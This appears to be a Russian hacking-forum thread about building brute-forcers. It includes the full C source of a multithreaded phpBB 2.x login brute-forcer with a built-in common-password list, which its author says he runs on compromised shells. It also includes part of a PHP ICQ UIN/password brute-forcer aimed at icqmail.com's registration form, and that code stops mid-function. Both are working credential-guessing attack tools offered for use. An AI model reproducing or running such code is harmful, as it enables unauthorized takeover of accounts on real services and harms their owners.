Народ, вот хочу написать свой брутфорсер. Что для этого надо, кроме мозгов и прямых рук?) Дайте ссылки на статьи и тому подобное, которые хоть немного упростят мне это нелёгкое дело. Буду признателен...
Да хотя бы на перлухе, главное, чтоб имел консольное или удалённое управление и висел в процессах. Брут должен уметь перебирать GET и POST, ICQ хотелось бы ещё, но для меня это будет слишком сложновато. Странно, что в инете мало распространены такие бруты, вот и пришёл к выводу, что легче будет, наверное, написать свой. ПИСИ: есть у меня один скриптик на перлухе, но он недоделанный — кому не лень разобраться в нём, могу скинуть...
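/*
 * pbf.c -- phpBB 2.x login.php dictionary / brute-force checker.
 *
 * Original forum post: "My old phpBB brute; I sometimes use it on shells
 * (best result so far: about 30 passwords per second)."
 * Build:   gcc -pthread pbf.c -o pbf -lcurses
 *
 * (C) KEZ <[email protected]> -- reviewed and cleaned up.
 *
 * Method (phpBB 2.x specific, see phpbb_checkpair()): POST username/password
 * to <path>login.php.  A reply carrying a Location header (phpBB redirects on
 * a successful login) counts as a good pair; a plain 200 page counts as a
 * rejected one.
 *
 * NOTE(review): run this only against forums you are authorised to test --
 * every attempt lands in the web server log and in any login throttling.
 */
#define _POSIX_C_SOURCE 200809L   /* getaddrinfo, inet_pton, nanosleep, getopt */

#include <arpa/inet.h>
#include <ctype.h>
#include <curses.h>
#include <errno.h>
#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>
#include <pthread.h>
#include <signal.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

/* phpbb_checkpair() results.  "SHAREERROR" (name kept from the original) is a
 * bad argument or local failure, i.e. the pair was never sent. */
#define PHPBB_CHECKPAIR_FORUMERROR      -6
#define PHPBB_CHECKPAIR_UNKNOWNRESPONSE -5
#define PHPBB_CHECKPAIR_FORBIDDEN       -4
#define PHPBB_CHECKPAIR_NOTFOUND        -3
#define PHPBB_CHECKPAIR_SHAREERROR      -2
#define PHPBB_CHECKPAIR_CONNECTERROR    -1
#define PHPBB_CHECKPAIR_GOOD             0
#define PHPBB_CHECKPAIR_BAD              1

/* phpbb_getnextpair() results */
#define PHPBB_GETNEXTPAIR_FILEERROR -1
#define PHPBB_GETNEXTPAIR_EOF        0
#define PHPBB_GETNEXTPAIR_OK         1

#define PHPBB_PASSWORD_LEN    32
#define PHPBB_LOGIN_LEN       25
#define PHPBB_PAIR_LEN        (PHPBB_PASSWORD_LEN + PHPBB_LOGIN_LEN + 3)
#define PHPBB_PATH_LEN        256
#define PHPBB_HOSTBUF_LEN     1024
#define PHPBB_REQUESTBUF_LEN  4096
#define PHPBB_RESPONSEBUF_LEN 8192   /* status line + headers are all we look at */
#define PHPBB_IO_TIMEOUT_SEC  30     /* a hung server must not pin a worker forever */
#define MAX_THREADS           300

typedef struct {
    char *hostname;      /* -h: name or dotted IPv4 address of the forum host */
    unsigned int port;   /* -s: TCP port, 80 by default */
    char *ip;            /* dotted IPv4 address hostname resolved to */
    char *path;          /* -p: directory holding login.php, "/" by default */
    int threads;         /* -t: number of worker threads, 1 by default */
    char *listfile;      /* -l: "login;password" lines, or one login per line with -P */
    char *logfile;       /* -o: good pairs are appended here, /dev/null by default */
    bool single;         /* -P: pair every login with common_passwords[] */
    bool curses;         /* -C: curses status screen instead of line output */
} prog_options;

FILE *phpbb_listfile;
FILE *phpbb_logfile;
pthread_t threads[MAX_THREADS];
pthread_t crefresh_thread;
pthread_mutex_t print_mutex = PTHREAD_MUTEX_INITIALIZER;          /* serialises curses / stdout output */
static pthread_mutex_t list_mutex = PTHREAD_MUTEX_INITIALIZER;    /* guards phpbb_listfile and curr_* */
static pthread_mutex_t log_mutex  = PTHREAD_MUTEX_INITIALIZER;    /* guards phpbb_logfile */
atomic_int stop_brute;          /* set by the signal handler or any worker: everybody winds down */
static atomic_int workers_done; /* set by main once all workers are joined: ends CursesRefresh */
prog_options prog;
static int  curr_pass;          /* -P mode: next index into common_passwords[] */
static bool curr_login_valid;   /* -P mode: curr_login holds a login read from the list */
char curr_login[PHPBB_LOGIN_LEN];
time_t start_time;
time_t stop_time;
time_t elapsed_time;
atomic_uint count_checked;
atomic_uint count_good;
float speed = 0;
char copyright[] = "(C) KEZ 2005";
char logo[] = "PHPBB BRUTEFORCE";

/* Common passwords tried for every login in -P mode.  NULL-terminated: the
 * original list had no sentinel, so the end-of-list test read past it. */
char *common_passwords[] = {
    "123", "1234", "12345", "123456", "1234567", "12345678", "87654321",
    "7654321", "654321", "54321", "4321", "321", "21", "q", "qw", "qwe",
    "qwer", "qwert", "qwerty", "qwerty", "ytrewq", "trewq", "rewq", "ewq",
    "wq", "1111", "111", "2222", "222", "3333", "333", "4444", "444",
    "5555", "555", "6666", "666", "7777", "777", "8888", "888", "9999",
    "999", "101010", "202020", "303030", "404040", "505050", "606060",
    "707070", "808080", "909090", "000000", "102030", "302010", "666666",
    "112233", "111222333", "q1w2e3", "pass", "password", "passpass",
    NULL
};

/* PHP explode() analogue for exactly two fields.
 * Copies the text before the first `separator` (';' if 0) into s1 and the
 * text after it into s2.  s1 must hold PHPBB_LOGIN_LEN bytes and s2
 * PHPBB_PASSWORD_LEN bytes (the buffers phpbb_brutethread() passes); longer
 * fields are truncated instead of overflowing as in the original.
 * Returns 1 on success, 0 when an argument is NULL or no separator exists. */
int explode(char *pair, char separator, char *s1, char *s2)
{
    const char *sep;
    size_t login_len;

    if (!pair || !s1 || !s2) return 0;
    if (!separator) separator = ';';
    sep = strchr(pair, separator);
    if (!sep) return 0;                      /* original: NULL - pair, undefined */

    login_len = (size_t)(sep - pair);
    if (login_len > PHPBB_LOGIN_LEN - 1) login_len = PHPBB_LOGIN_LEN - 1;
    memcpy(s1, pair, login_len);
    s1[login_len] = '\0';
    snprintf(s2, PHPBB_PASSWORD_LEN, "%s", sep + 1);
    return 1;
}

/* Perl chomp() analogue: cut s at its first CR and at its first LF.
 * Returns 0 on success, -1 when s is NULL. */
int chomp(char *s)
{
    char *p;

    if (!s) return -1;
    if ((p = strchr(s, '\r'))) *p = '\0';
    if ((p = strchr(s, '\n'))) *p = '\0';
    return 0;
}

/* Percent-encode s as an application/x-www-form-urlencoded value into out
 * (outlen bytes).  Unreserved characters pass through, everything else
 * becomes %XX, so '&', '+', '%' or spaces in a password reach the server
 * intact.  Returns 1 on success, 0 if out is too small (out is then unusable). */
static int url_encode(const char *s, char *out, size_t outlen)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;

    if (!s || !out || outlen == 0) return 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
            if (o + 1 >= outlen) return 0;
            out[o++] = (char)c;
        } else {
            if (o + 3 >= outlen) return 0;
            out[o++] = '%';
            out[o++] = hex[c >> 4];
            out[o++] = hex[c & 0x0f];
        }
    }
    out[o] = '\0';
    return 1;
}

/* DNS resolver: first IPv4 address of hostname as a dotted string in a static
 * buffer (not thread-safe; called once from main before workers start), or
 * NULL when resolution fails. */
char *GetIP(char *hostname)
{
    static char ipbuf[INET_ADDRSTRLEN];
    struct addrinfo hints;
    struct addrinfo *res = NULL;
    struct sockaddr_in *sin;
    const char *ok;

    if (!hostname) return NULL;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;         /* the transport below is IPv4 only */
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(hostname, NULL, &hints, &res) != 0 || !res) return NULL;
    sin = (struct sockaddr_in *)res->ai_addr;
    ok = inet_ntop(AF_INET, &sin->sin_addr, ipbuf, sizeof ipbuf);
    freeaddrinfo(res);
    return ok ? ipbuf : NULL;
}

/* send() until every byte of buf is out.  Returns 0, or -1 on a socket error. */
static int send_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(fd, buf, len, 0);
        if (n < 0) {
            if (errno == EINTR) continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* login-password pair checker.
 * POSTs login/password to http://hostname:port<path>login.php (connecting to
 * ip) and classifies the reply by its status code, a phpBB "Critical Error"
 * page, and the presence of a Location header (phpBB 2.x redirects after a
 * successful login, so a redirect is GOOD and a 200 page is BAD).
 * Returns one of the PHPBB_CHECKPAIR_* codes.  Unlike the original this
 * honours the ip/port arguments, always closes the socket, URL-encodes the
 * form fields and NUL-terminates the reply before searching it. */
int phpbb_checkpair(char *ip, unsigned int port, char *hostname, char *path,
                    char *login, char *password)
{
    int s;
    int rc = PHPBB_CHECKPAIR_CONNECTERROR;
    struct sockaddr_in s_a;
    struct timeval tv;
    char enc_login[PHPBB_LOGIN_LEN * 3];
    char enc_pass[PHPBB_PASSWORD_LEN * 3];
    char hostport[PHPBB_HOSTBUF_LEN];
    char body[256];
    char request[PHPBB_REQUESTBUF_LEN];
    char response[PHPBB_RESPONSEBUF_LEN];
    const char *code;
    int body_len, req_len, n;
    size_t got = 0;

    if (!ip || !hostname || !login || !password || !path) return PHPBB_CHECKPAIR_SHAREERROR;
    if (strlen(path) > PHPBB_PATH_LEN) return PHPBB_CHECKPAIR_SHAREERROR;
    if (port == 0 || port > 65535) return PHPBB_CHECKPAIR_SHAREERROR;
    if (!url_encode(login, enc_login, sizeof enc_login) ||
        !url_encode(password, enc_pass, sizeof enc_pass))
        return PHPBB_CHECKPAIR_SHAREERROR;

    memset(&s_a, 0, sizeof s_a);
    s_a.sin_family = AF_INET;
    s_a.sin_port = htons((uint16_t)port);
    if (inet_pton(AF_INET, ip, &s_a.sin_addr) != 1) return PHPBB_CHECKPAIR_SHAREERROR;

    /* Host header / request-target: the original omitted a non-default port */
    if (port == 80) n = snprintf(hostport, sizeof hostport, "%s", hostname);
    else n = snprintf(hostport, sizeof hostport, "%s:%u", hostname, port);
    if (n < 0 || (size_t)n >= sizeof hostport) return PHPBB_CHECKPAIR_SHAREERROR;

    body_len = snprintf(body, sizeof body,
                        "username=%s&password=%s&redirect=&login=Log+in",
                        enc_login, enc_pass);
    if (body_len < 0 || (size_t)body_len >= sizeof body) return PHPBB_CHECKPAIR_SHAREERROR;

    /* Content-Length is the real body length; the original used a hand-counted
     * constant and LF-only line ends. */
    req_len = snprintf(request, sizeof request,
                       "POST http://%s%slogin.php HTTP/1.1\r\n"
                       "Host: %s\r\n"
                       "Content-Type: application/x-www-form-urlencoded\r\n"
                       "Content-Length: %d\r\n"
                       "Connection: Close\r\n"
                       "\r\n"
                       "%s",
                       hostport, path, hostport, body_len, body);
    if (req_len < 0 || (size_t)req_len >= sizeof request) return PHPBB_CHECKPAIR_SHAREERROR;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return PHPBB_CHECKPAIR_SHAREERROR;   /* original tested "!s": -1 is the failure value */

    tv.tv_sec = PHPBB_IO_TIMEOUT_SEC;
    tv.tv_usec = 0;
    (void)setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);   /* best effort */
    (void)setsockopt(s, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof tv);

    if (connect(s, (struct sockaddr *)&s_a, sizeof s_a) < 0) goto out;
    if (send_all(s, request, (size_t)req_len) < 0) goto out;

    /* Read until the server closes (Connection: Close) or the buffer is full. */
    while (got < sizeof response - 1) {
        ssize_t r = recv(s, response + got, sizeof response - 1 - got, 0);
        if (r < 0) {
            if (errno == EINTR) continue;
            goto out;
        }
        if (r == 0) break;
        got += (size_t)r;
    }
    response[got] = '\0';

    /* "HTTP/x.y NNN": the status code starts at offset 9 */
    if (got < 12 || strncmp(response, "HTTP/", 5) != 0) {
        rc = PHPBB_CHECKPAIR_UNKNOWNRESPONSE;
        goto out;
    }
    code = response + 9;
    if (!strncmp(code, "404", 3)) rc = PHPBB_CHECKPAIR_NOTFOUND;
    else if (!strncmp(code, "403", 3)) rc = PHPBB_CHECKPAIR_FORBIDDEN;
    else if (strncmp(code, "200", 3) && strncmp(code, "302", 3)) rc = PHPBB_CHECKPAIR_UNKNOWNRESPONSE;
    else if (strstr(response, "phpBB : <b>Critical Error</b>")) rc = PHPBB_CHECKPAIR_FORUMERROR;
    else if (strstr(response, "Location: ")) rc = PHPBB_CHECKPAIR_GOOD;   /* original: "Location: http://" only */
    else rc = PHPBB_CHECKPAIR_BAD;

out:
    close(s);
    return rc;
}

/* listfile fopen(): 1 on success, 0 if fopen fails, -1 if filename is NULL or
 * a list file is already open. */
int phpbb_openlistfile(char *filename)
{
    if (!filename) return -1;
    if (phpbb_listfile) return -1;
    phpbb_listfile = fopen(filename, "r");
    return phpbb_listfile ? 1 : 0;
}

/* listfile fclose() (the original called close() on a FILE *).  Returns 1. */
int phpbb_closelistfile(void)
{
    if (phpbb_listfile) fclose(phpbb_listfile);
    phpbb_listfile = NULL;
    return 1;
}

/* logfile fopen() (truncating): same return convention as phpbb_openlistfile(). */
int phpbb_openlogfile(char *filename)
{
    if (!filename) return -1;
    if (phpbb_logfile) return -1;
    phpbb_logfile = fopen(filename, "w");
    return phpbb_logfile ? 1 : 0;
}

/* logfile fclose().  Returns 1. */
int phpbb_closelogfile(void)
{
    if (phpbb_logfile) fclose(phpbb_logfile);
    phpbb_logfile = NULL;
    return 1;
}

/* Append s to the log and flush, serialised across workers.
 * Returns 0, or -1 when no log is open or s is NULL. */
int putlog(char *s)
{
    if (!phpbb_logfile || !s) return -1;
    pthread_mutex_lock(&log_mutex);
    fputs(s, phpbb_logfile);
    fflush(phpbb_logfile);
    pthread_mutex_unlock(&log_mutex);
    return 0;
}

/* Read the next non-blank line of f into buf (len bytes), stripped of its
 * line ending; a line longer than len-1 is truncated and the rest discarded.
 * Returns 1 on a line, 0 at EOF, -1 on a read error.  Caller holds list_mutex. */
static int read_line(FILE *f, char *buf, size_t len)
{
    for (;;) {
        if (!fgets(buf, (int)len, f)) return ferror(f) ? -1 : 0;
        if (!strchr(buf, '\n')) {
            int c;
            while ((c = fgetc(f)) != EOF && c != '\n')
                ;                            /* drop the overlong remainder */
        }
        chomp(buf);
        if (buf[0] != '\0') return 1;        /* blank lines would read as "wrong format" */
    }
}

/* Hand the next "login;password" pair (PHPBB_PAIR_LEN bytes) to a worker.
 * Without -P each list line is a pair.  With -P each list line is a login
 * that is combined with every entry of common_passwords[] in turn.
 * Safe to call from several threads.  Returns a PHPBB_GETNEXTPAIR_* code. */
int phpbb_getnextpair(char *pair)
{
    int rc = PHPBB_GETNEXTPAIR_FILEERROR;
    int r;

    if (!pair || !phpbb_listfile) return rc;
    pthread_mutex_lock(&list_mutex);
    if (prog.single) {
        if (!curr_login_valid || !common_passwords[curr_pass]) {
            r = read_line(phpbb_listfile, curr_login, sizeof curr_login);
            if (r <= 0) {
                rc = (r == 0) ? PHPBB_GETNEXTPAIR_EOF : PHPBB_GETNEXTPAIR_FILEERROR;
                goto out;
            }
            curr_login_valid = true;
            curr_pass = 0;                   /* original started at -1 and indexed with it */
        }
        snprintf(pair, PHPBB_PAIR_LEN, "%s;%s", curr_login, common_passwords[curr_pass]);
        curr_pass++;
        rc = PHPBB_GETNEXTPAIR_OK;
    } else {
        r = read_line(phpbb_listfile, pair, PHPBB_PAIR_LEN);
        rc = (r > 0) ? PHPBB_GETNEXTPAIR_OK
           : (r == 0) ? PHPBB_GETNEXTPAIR_EOF : PHPBB_GETNEXTPAIR_FILEERROR;
    }
out:
    pthread_mutex_unlock(&list_mutex);
    return rc;
}

/* curses: highlighted "N)" label at the start of the thread's row.
 * Caller holds print_mutex. */
void PrintCursesThreadNumber(int thread_num)
{
    char msg[16];

    snprintf(msg, sizeof msg, "%d)", thread_num);
    move(4 + thread_num, 0);
    standout();
    addstr(msg);
    standend();
}

/* Report a per-thread condition that ends the run (leaving curses mode so the
 * message is readable) and ask every worker to stop. */
static void thread_stop(int thread_num, const char *level, const char *what)
{
    pthread_mutex_lock(&print_mutex);
    if (prog.curses) endwin();
    printf(" [%s] [Thread #%d] %s\n", level, thread_num, what);
    pthread_mutex_unlock(&print_mutex);
    atomic_store(&stop_brute, 1);
}

/* Text for the fatal phpbb_checkpair() results. */
static const char *checkpair_error_text(int rc)
{
    switch (rc) {
    case PHPBB_CHECKPAIR_SHAREERROR:      return "SHARE ERROR";
    case PHPBB_CHECKPAIR_CONNECTERROR:    return "CONNECTION FAILED";
    case PHPBB_CHECKPAIR_UNKNOWNRESPONSE: return "UNKNOWN SERVER RESPONSE";
    case PHPBB_CHECKPAIR_FORBIDDEN:       return "FORBIDDEN";
    case PHPBB_CHECKPAIR_NOTFOUND:        return "NOT FOUND";
    case PHPBB_CHECKPAIR_FORUMERROR:      return "REMOTE ERROR";
    default:                              return "UNEXPECTED RESULT";
    }
}

/* Worker thread: pull pairs until the list is exhausted, a fatal check
 * result occurs or stop_brute is raised.  parameter is the 1-based thread
 * number (passed as an intptr_t cast to void *). */
void *phpbb_brutethread(void *parameter)
{
    char pair[PHPBB_PAIR_LEN];
    char login[PHPBB_LOGIN_LEN];
    char password[PHPBB_PASSWORD_LEN];
    char msg[128];
    int i, r;
    int thread_num = (int)(intptr_t)parameter;

    if (!prog.curses) printf(" [INFO] [Thread #%d] <SPAWNED>\n", thread_num);

    while (!atomic_load(&stop_brute)) {
        if (prog.curses) {
            pthread_mutex_lock(&print_mutex);
            PrintCursesThreadNumber(thread_num);
            pthread_mutex_unlock(&print_mutex);
        }

        r = phpbb_getnextpair(pair);
        if (r == PHPBB_GETNEXTPAIR_EOF) {
            thread_stop(thread_num, "INFO", "EOF");
            break;
        }
        if (r != PHPBB_GETNEXTPAIR_OK) {
            thread_stop(thread_num, "ERROR", "LISTFILE READ ERROR");
            break;
        }

        memset(login, 0, sizeof login);
        memset(password, 0, sizeof password);
        if (!explode(pair, ';', login, password)) {
            thread_stop(thread_num, "INFO", "WRONG LISTFILE FORMAT");
            break;
        }

        if (prog.curses) {
            pthread_mutex_lock(&print_mutex);
            move(4 + thread_num, 6);
            snprintf(msg, sizeof msg, "%s;%s", login, password);
            addstr(msg);
            for (i = 0; i <= 80 - (int)strlen(msg); i++) addch(' ');   /* wipe the rest of the row */
            pthread_mutex_unlock(&print_mutex);
        }

        r = phpbb_checkpair(prog.ip, prog.port, prog.hostname, prog.path, login, password);
        switch (r) {
        case PHPBB_CHECKPAIR_GOOD:
            if (!prog.curses)
                printf(" [INFO] [Thread #%d] GOOD PAIR: %s;%s\n", thread_num, login, password);
            atomic_fetch_add(&count_good, 1u);
            /* one putlog() per pair so concurrent hits cannot interleave */
            snprintf(msg, sizeof msg, "LOGIN: %s PASSWORD: %s\n", login, password);
            putlog(msg);
            break;
        case PHPBB_CHECKPAIR_BAD:
            if (!prog.curses)
                printf(" [INFO] [Thread #%d] BAD PAIR: %s;%s\n", thread_num, login, password);
            break;
        default:
            thread_stop(thread_num, "ERROR", checkpair_error_text(r));
            break;
        }
        atomic_fetch_add(&count_checked, 1u);   /* counted even when fatal, as before */
    }

    if (!prog.curses) printf(" [INFO] [Thread #%d] <KILLED>\n", thread_num);
    return NULL;
}

/* Final statistics on stdout; uses the global start/stop times and counters. */
void Stats(void)
{
    unsigned checked = atomic_load(&count_checked);
    unsigned good = atomic_load(&count_good);

    elapsed_time = stop_time - start_time;
    if (elapsed_time > 0 && checked) speed = (float)checked / (float)elapsed_time;
    else speed = 0;
    printf("[STATS]\n");
    printf("Time started : %s", ctime(&start_time));
    printf("Time finished : %s", ctime(&stop_time));
    printf("Elapsed : %ld seconds\n", (long)elapsed_time);
    printf("Checked : %u pairs\n", checked);
    printf("Good : %u pairs\n", good);
    printf("Speed : %f pairs/second\n", speed);
    printf("\n");
}

/* usage: print the option summary, plus s as an error line if given, and exit
 * (non-zero when s is an error message). */
void Usage(char *s)
{
    printf("Usage: ./prog -h host [-s port] [-p path] -l listfile\n");
    printf(" [-t threads] [-o outfile] [-P] [-C]\n\n");
    printf(" host : phpBB hostname or IP address\n");
    printf(" port : web server port, 80 by default\n");
    printf(" path : remote path, where phpBB located, / by default\n");
    printf(" listfile : file with login;password pairs or single login,\n "
           " if -P specified\n");
    printf(" threads : number of threads, 1 by default (max %d)\n", MAX_THREADS);
    printf(" outfile : write bruted pairs to this file, /dev/null by default\n");
    printf(" -P : use common passwords. -l options = single LOGIN\n");
    printf(" -C : use curses lib. graphical output\n");
    printf("\n");
    if (s) printf("------- %s-------\n", s);
    exit(s ? EXIT_FAILURE : EXIT_SUCCESS);
}

/* SIGINT/SIGTERM handler: raise stop_brute so the workers finish their current
 * request and exit.  Only async-signal-safe calls (no printf) are used. */
void sigint_catch(int signo)
{
    static const char msg[] = "[INFO] [SIGINT Handler] INTERRUPT (Ctrl+C)\n";

    if (atomic_load(&stop_brute)) return;
    atomic_store(&stop_brute, 1);
    if (signo == SIGINT && !prog.curses) {
        ssize_t w = write(STDOUT_FILENO, msg, sizeof msg - 1);
        (void)w;
    }
}

/* Print the effective settings: as a [SETTINGS] block on stdout, or as one
 * line near the bottom of the curses screen. */
void PrintCursesConfig(void)
{
    char msg[1024];

    if (!prog.curses) {
        printf("\n[SETTINGS]\n");
        printf(" HOST : %s\n", prog.hostname);
        printf(" IP : %s\n", prog.ip);
        printf(" PORT : %u\n", prog.port);
        printf(" PATH : %s\n", prog.path);
        printf(" LISTFILE : %s\n", prog.listfile);
        printf(" THREADS : %d\n", prog.threads);
        if (prog.logfile) printf(" OUTFILE : %s\n", prog.logfile);
        printf(" OTHER : ");
        if (prog.single) printf("USE COMMON PASSWORDS ");
        if (prog.curses) printf("USE CURSES OUTPUT");
        if (!prog.single && !prog.curses) printf("NO");
        printf("\n\n");
    } else {
        move(LINES - 6, 2);
        snprintf(msg, sizeof msg,
                 "http://%s:%u%s (%s)\n (listfile: %s)"
                 " (outfile: %s) (threads: %d)",
                 prog.hostname, prog.port, prog.path, prog.ip,
                 prog.listfile, prog.logfile, prog.threads);
        addstr(msg);
    }
}

/* curses: centred, highlighted program logo on row 1 */
void PrintCursesLogo(void)
{
    standout();
    move(1, COLS / 2 - (int)strlen(logo) / 2);
    addstr(logo);
    standend();
}

/* curses: speed / elapsed minutes / checked / good line.  The original used a
 * 20-byte buffer for this line and overflowed it. */
void PrintCursesSpeed(void)
{
    char msg[128];
    unsigned checked = atomic_load(&count_checked);

    elapsed_time = time(NULL) - start_time;
    if (elapsed_time <= 0 || !checked) return;
    speed = (float)checked / (float)elapsed_time;
    pthread_mutex_lock(&print_mutex);
    move(LINES - 7, 2);
    snprintf(msg, sizeof msg, "SP %f | EL %ld | AL %u | GD %u",
             speed, (long)(elapsed_time / 60), checked, atomic_load(&count_good));
    addstr(msg);
    pthread_mutex_unlock(&print_mutex);
}

/* curses: centred copyright line near the bottom */
void PrintCursesCopyright(void)
{
    move(LINES - 2, COLS / 2 - (int)strlen(copyright) / 2);
    addstr(copyright);
}

/* curses lib. initialise and draw the static parts of the screen */
void InitCurses(void)
{
    initscr();
    clear();
    PrintCursesLogo();
    PrintCursesCopyright();
    PrintCursesConfig();
    refresh();
}

/* Screen refresh thread: redraw the speed line five times a second until main
 * signals workers_done.  The original looped without sleeping (100% CPU) and
 * was never joined, so it raced main's endwin(). */
void *CursesRefresh(void *param)
{
    const struct timespec tick = { 0, 200L * 1000L * 1000L };

    (void)param;
    while (!atomic_load(&workers_done)) {
        PrintCursesSpeed();
        pthread_mutex_lock(&print_mutex);
        move(LINES - 1, COLS - 1);
        refresh();
        pthread_mutex_unlock(&print_mutex);
        nanosleep(&tick, NULL);
    }
    return NULL;
}

/* entry point: parse options, resolve the host, open the files, run the
 * workers (and the curses refresher), then print statistics. */
int main(int argc, char *argv[])
{
    static char pathbuf[PHPBB_PATH_LEN + 2];
    struct in_addr probe;
    int i, opt, started;

    opterr = 0;
    if (argc < 2) Usage(NULL);
    while ((opt = getopt(argc, argv, "h:s:p:l:t:o:PC")) != -1) {
        switch (opt) {
        case 'h': prog.hostname = optarg; break;
        case 's': prog.port = (unsigned int)atoi(optarg); break;
        case 'p': prog.path = optarg; break;
        case 'l': prog.listfile = optarg; break;
        case 't': prog.threads = atoi(optarg); break;
        case 'o': prog.logfile = optarg; break;
        case 'P': prog.single = true; break;
        case 'C': prog.curses = true; break;
        default:
            printf("Option error - %c\n", optopt);
            Usage(NULL);
        }
    }
    if (!prog.hostname) Usage("Hostname needed!");
    if (!prog.listfile) Usage("Listfile needed!");
    if (!prog.logfile) prog.logfile = "/dev/null";
    if (!prog.threads) prog.threads = 1;
    if (!prog.path) prog.path = "/";
    if (!prog.port) prog.port = 80;

    /* the original indexed threads[1..N] with no bound and let any port through */
    if (prog.threads < 1 || prog.threads > MAX_THREADS) Usage("Bad thread count!");
    if (prog.port > 65535) Usage("Bad port!");
    if (strlen(prog.path) > PHPBB_PATH_LEN) Usage("Path too long!");
    /* login.php is appended verbatim, so a path must end in '/' */
    if (prog.path[strlen(prog.path) - 1] != '/') {
        snprintf(pathbuf, sizeof pathbuf, "%s/", prog.path);
        prog.path = pathbuf;
    }

    if (inet_pton(AF_INET, prog.hostname, &probe) == 1) prog.ip = prog.hostname;
    else prog.ip = GetIP(prog.hostname);
    if (!prog.ip) {
        printf("[ERROR] [Main Thread] CANNOT RESOLVE HOST\n\n");
        return EXIT_FAILURE;
    }

    if (prog.curses) {
        InitCurses();
    } else {
        printf("\nphpBB Bruteforce\n");
        printf("for education purposes only\n");
        printf("KEZ <[email protected]> (C) ANTICHAT.RU. CODED IN 2005 YEAR.\n\n");
    }

    signal(SIGINT, sigint_catch);
    signal(SIGTERM, sigint_catch);  /* graceful stop instead of the original SIG_IGN */
    signal(SIGHUP, SIG_IGN);        /* survive the shell going away, as intended */
    signal(SIGPIPE, SIG_IGN);       /* send() to a closed socket returns -1 instead */
    /* SIGSEGV is no longer ignored: ignoring it only made a crash re-fault forever */

    if (phpbb_openlistfile(prog.listfile) != 1) {
        if (prog.curses) endwin();
        printf("[ERROR] [Main Thread] CANNOT OPEN LISTFILE\n\n");
        return EXIT_FAILURE;
    }
    if (phpbb_openlogfile(prog.logfile) != 1) {
        if (prog.curses) endwin();
        printf("[ERROR] [Main Thread] CANNOT OPEN OUTFILE\n\n");
        phpbb_closelistfile();
        return EXIT_FAILURE;
    }

    start_time = time(NULL);
    if (prog.curses && pthread_create(&crefresh_thread, NULL, CursesRefresh, NULL) != 0) {
        endwin();
        printf("[ERROR] [Main Thread] CANNOT START REFRESH THREAD\n\n");
        prog.curses = false;
    }

    if (!prog.curses) printf("[INFO] [Main Thread] CREATING THREADS...\n");
    for (i = 1; i <= prog.threads; i++) {
        if (atomic_load(&stop_brute)) break;
        if (pthread_create(&threads[i - 1], NULL, phpbb_brutethread,
                           (void *)(intptr_t)i) != 0) {
            atomic_store(&stop_brute, 1);
            break;
        }
    }
    started = i - 1;
    for (i = 0; i < started; i++) pthread_join(threads[i], NULL);

    atomic_store(&workers_done, 1);
    if (prog.curses) pthread_join(crefresh_thread, NULL);
    if (!prog.curses) printf("[INFO] [Main Thread] ALL THREADS KILLED\n\n");
    stop_time = time(NULL);
    if (prog.curses) endwin();
    Stats();
    phpbb_closelistfile();   /* also used in -P mode; the original leaked it there */
    phpbb_closelogfile();
    return EXIT_SUCCESS;
}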
Мож, пригодится: документация по LWP — для написания перловых сплойтов самое оно: http://perldoc.narod.ru/LWP-spec.pdf
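Кто-нибудь может этот код перегнать в perl? Code:
<?php
/*
 * ICQ brute-forcer by Zadoxlik (idea: The FUF).
 *
 * Submits the ICQmail registration form once per UIN in the given range with
 * the candidate password.  A reply that lacks the "We're sorry, your ICQ" text
 * is taken as "the UIN/password pair was accepted" and appended to good.txt.
 *
 * NOTE(review): as noted later in the thread the form now has a CAPTCHA, so
 * this no longer works; it is kept for reference.  The original hard-coded
 * "Content-Length: 116" although the body length varies with the UIN and the
 * password, and logged any connection failure as a hit because an empty reply
 * also lacks the rejection text.  Both are fixed below.
 */
?>
<h4>ICQ брутофорс</h4>
<form method="post" action="">
Аськи с <input type="text" name="diap1"> по <input type="text" name="diap2">
<br>тестим на пасс <input type="text" name="pass">
<input type="submit" value="давай">
</form>
<?php
/**
 * Send one registration attempt for $uin with password $pass.
 *
 * @param int    $uin  ICQ number to try
 * @param string $pass candidate password
 * @return string|null raw HTTP reply, or null when the connection or the
 *                     write failed (so the caller can tell "no answer" apart
 *                     from "answer without the rejection text")
 */
function icq_try($uin, $pass)
{
    $host = 'www.icqmail.com';
    $url  = 'http://www.icqmail.com/s/icq/reg_icq.asp';

    // Field values are URL-encoded so '&', '+' or spaces in the password do
    // not break the form body (the original sent them raw).  The original
    // sent "xo=" followed by "US" on the next line; presumably the country
    // field, so it is sent as a normal value here.
    $body = 'AltID=' . urlencode($uin)
          . '&user=gfsdghfshh'
          . '&pwd=' . urlencode($pass)
          . '&repwd=' . urlencode($pass)
          . '&firstname=&lastname=&tosagree=on&action=register&xo=US';

    $sock = @fsockopen($host, 80, $errno, $errstr, 100);
    if (!$sock) {
        return null;
    }

    $request = "POST $url HTTP/1.0\r\n"
             . "Host: $host\r\n"
             . "Accept: */*\r\n"
             . "Accept-Language: ru\r\n"
             . "Proxy-Connection: Keep-Alive\r\n"
             . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
             . "Referer: $url\r\n"
             . "Content-Type: application/x-www-form-urlencoded\r\n"
             . "Content-Length: " . strlen($body) . "\r\n"   // real length, not 116
             . "Pragma: no-cache\r\n"
             . "Cookie: lang=xx; temp=; domaincode=icq\r\n"
             . "\r\n"
             . $body;

    if (fwrite($sock, $request) === false) {
        fclose($sock);
        return null;
    }

    // Read the whole reply instead of a fixed number of fgets() calls.
    $reply = '';
    while (!feof($sock)) {
        $chunk = fread($sock, 4096);
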